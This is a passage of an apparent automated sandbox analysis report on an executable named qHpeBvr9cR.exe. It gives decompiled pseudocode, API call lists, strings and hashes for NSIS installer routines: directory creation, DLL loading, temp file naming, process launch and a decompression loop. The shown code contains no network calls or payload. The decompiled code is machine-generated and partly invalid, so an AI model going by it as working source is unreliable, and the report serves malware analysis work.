								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x24)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405CFB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                              0x004015b3
                                              0x004015ba
                                              0x004015bd
                                              0x004015c2
                                              0x004015c6
                                              0x004015c8
                                              0x004015d0
                                              0x004015d6
                                              0x004015d8
                                              0x004015db
                                              0x004015e3
                                              0x004015f0
                                              0x004015fd
                                              0x004015fd
                                              0x004015f2
                                              0x004015f3
                                              0x004015fb
                                              0x00000000
                                              0x00000000
                                              0x004015fb
                                              0x004015f0
                                              0x00401600
                                              0x00401603
                                              0x00401605
                                              0x00401606
                                              0x004015c8
                                              0x0040160d
                                              0x0040162d
                                              0x0040217a
                                              0x0040160f
                                              0x00401611
                                              0x0040161c
                                              0x00401622
                                              0x00401622
                                              0x004028a4
                                              0x004028b0

                                              APIs
                                                • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405890
                                                • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                                                • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                                              • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                              • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                              • String ID: C:\Users\user\AppData\Local\Temp
                                              • API String ID: 3751793516-1943935188
                                              • Opcode ID: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                                              • Instruction ID: d0a9f9296d723caddbd0f60560613e174b6a475f07d6f089b0aabedb845a292b
                                              • Opcode Fuzzy Hash: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                                              • Instruction Fuzzy Hash: CE010832908140AFD7217B755D4497F37B4DE91369724463FF891B22E1C63C0D42962E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040601D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 505 40601d-40603d GetSystemDirectoryA 506 406041-406043 505->506 507 40603f 505->507 508 406053-406055 506->508 509 406045-40604d 506->509 507->506 511 406056-406084 wsprintfA LoadLibraryA 508->511 509->508 510 40604f-406051 509->510 510->511
                                              C-Code - Quality: 100%
                                              			E0040601D(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryA( &_v292); // executed
				return _t14;
			}








                                              0x00406034
                                              0x0040603d
                                              0x0040603f
                                              0x0040603f
                                              0x00406043
                                              0x00406055
                                              0x0040604f
                                              0x0040604f
                                              0x0040604f
                                              0x00406059
                                              0x0040606d
                                              0x0040607d
                                              0x00406084

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%s.dll$\
                                              • API String ID: 2200240437-500877883
                                              • Opcode ID: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                                              • Instruction ID: 31df564d024cf24b7dbdd433d12669610400c14d1f093727c30223d65afe2acb
                                              • Opcode Fuzzy Hash: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                                              • Instruction Fuzzy Hash: CBF02B309441095BDF14E764DC0DEFB375CEB08344F0445BBA54BE10D2FA78E8698B98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405A01 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 512 405a01-405a0b 513 405a0c-405a36 GetTickCount GetTempFileNameA 512->513 514 405a45-405a47 513->514 515 405a38-405a3a 513->515 517 405a3f-405a42 514->517 515->513 516 405a3c 515->516 516->517
                                              C-Code - Quality: 100%
                                              			E00405A01(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                              0x00405a05
                                              0x00405a0b
                                              0x00405a0c
                                              0x00405a0c
                                              0x00405a0d
                                              0x00405a14
                                              0x00405a1e
                                              0x00405a2b
                                              0x00405a2e
                                              0x00405a36
                                              0x00000000
                                              0x00000000
                                              0x00405a3a
                                              0x00000000
                                              0x00000000
                                              0x00405a3c
                                              0x00000000
                                              0x00405a3c
                                              0x00000000

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00405A14
                                              • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405A2E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: "C:\Users\user\Desktop\qHpeBvr9cR.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                              • API String ID: 1716503409-1677914319
                                              • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                              • Instruction ID: 5b0006bac455ae629d1f86c67115003f625ce1c04593d449782858effb37a924
                                              • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                              • Instruction Fuzzy Hash: 81F020327082087BEB104E49EC44B9B7FADDFC5720F10C12BFA049A1C0C2B0A9488BA9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004058CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 601 4058cf-4058ea call 405cfb call 405882 606 4058f0-4058fd call 405f5d 601->606 607 4058ec-4058ee 601->607 611 405909-40590b 606->611 612 4058ff-405903 606->612 608 405942-405944 607->608 614 405921-40592a lstrlenA 611->614 612->607 613 405905-405907 612->613 613->607 613->611 615 40592c-405940 call 4057ee GetFileAttributesA 614->615 616 40590d-405914 call 405ff6 614->616 615->608 621 405916-405919 616->621 622 40591b-40591c call 405835 616->622 621->607 621->622 622->614
                                              C-Code - Quality: 53%
                                              			E004058CF(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405CFB(0x421988, _a4);
				_t21 = E00405882(0x421988);
				if(_t21 != 0) {
					E00405F5D(_t21);
					if(( *0x423f98 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421988;
						while(1) {
							_t11 = lstrlenA(0x421988);
							_push(0x421988);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405FF6();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405835(0x421988);
								continue;
							} else {
								goto L1;
							}
						}
						E004057EE();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                              0x004058db
                                              0x004058e6
                                              0x004058ea
                                              0x004058f1
                                              0x004058fd
                                              0x00405909
                                              0x00405909
                                              0x00405921
                                              0x00405922
                                              0x00405929
                                              0x0040592a
                                              0x00000000
                                              0x00000000
                                              0x0040590d
                                              0x00405914
                                              0x0040591c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405914
                                              0x0040592c
                                              0x00405932
                                              0x00000000
                                              0x00405940
                                              0x004058ff
                                              0x00405903
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405903
                                              0x004058ec
                                              0x00000000

                                              APIs
                                                • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08
                                                • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405890
                                                • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                                                • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                                              • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405922
                                              • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405932
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID: C:\
                                              • API String ID: 3248276644-3404278061
                                              • Opcode ID: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                                              • Instruction ID: 03f6043ec37f77008ca106ed659fbfe74b4750b5f08ac9da600103de26cb934a
                                              • Opcode Fuzzy Hash: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                                              • Instruction Fuzzy Hash: 94F02822509E116AC222333A1C09A9F0A19CE86338714453BFC51B22D2DB3C8D53ED7E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040555B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 624 40555b-405588 CreateProcessA 625 405596-405597 624->625 626 40558a-405593 CloseHandle 624->626 626->625
                                              C-Code - Quality: 100%
                                              			E0040555B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422588->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422588,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                              0x00405564
                                              0x00405580
                                              0x00405588
                                              0x0040558d
                                              0x00000000
                                              0x00405593
                                              0x00405597

                                              APIs
                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                                              • CloseHandle.KERNEL32(?), ref: 0040558D
                                              Strings
                                              • Error launching installer, xrefs: 0040556E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                                              • Instruction ID: b38bf566800866b301abd826c958dc9a0f2413a88be004d39ffa53c3aefd5702
                                              • Opcode Fuzzy Hash: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                                              • Instruction Fuzzy Hash: 29E0ECB4A0020ABBDB109F64ED09A6B7BBDFB14345F808921A914E2150E7B8D9549A69
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406768 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 631 406768-40676e 632 406770-406772 631->632 633 406773-406a71 631->633 632->633 635 406a9b-406a9f 633->635 636 406aa1-406ac2 635->636 637 406aff-406b12 635->637 638 406ac4-406ad9 636->638 639 406adb-406aee 636->639 640 406a1b-406a21 637->640 642 406af1-406af8 638->642 639->642 645 4061c6 640->645 646 406bce 640->646 643 406a98 642->643 644 406afa 642->644 643->635 655 406a7d-406a95 644->655 656 406baf 644->656 647 406272-406276 645->647 648 4062e2-4062e6 645->648 649 4061cd-4061d1 645->649 650 40630d-4069b4 645->650 651 406bd1-406bd5 646->651 660 406b22-406b2c 647->660 661 40627c-406295 647->661 657 406b31-406b3b 648->657 658 4062ec-406300 648->658 653 4061d7-4061e4 649->653 654 406bb9-406bcc 649->654 664 4069b6-4069cc 650->664 665 4069ce-4069e4 650->665 653->646 662 4061ea-406230 653->662 654->651 655->643 656->654 657->654 663 406303-40630b 658->663 660->654 666 406298-40629c 661->666 667 406232-406236 662->667 668 406258-40625a 662->668 663->648 663->650 669 4069e7-4069ee 664->669 665->669 666->647 670 40629e-4062a4 666->670 671 406241-40624f GlobalAlloc 667->671 672 406238-40623b GlobalFree 667->672 673 406268-406270 668->673 674 40625c-406266 668->674 675 4069f0-4069f4 669->675 676 406a15 669->676 677 4062a6-4062ad 670->677 678 4062ce-4062e0 670->678 671->646 679 406255 671->679 672->671 673->666 674->673 674->674 680 406ba3-406bad 675->680 681 4069fa-406a12 675->681 676->640 682 4062b8-4062c8 GlobalAlloc 677->682 683 4062af-4062b2 GlobalFree 677->683 678->663 679->668 680->654 681->676 682->646 682->678 683->682
                                              C-Code - Quality: 99%
                                              			E00406768() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406BD6))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
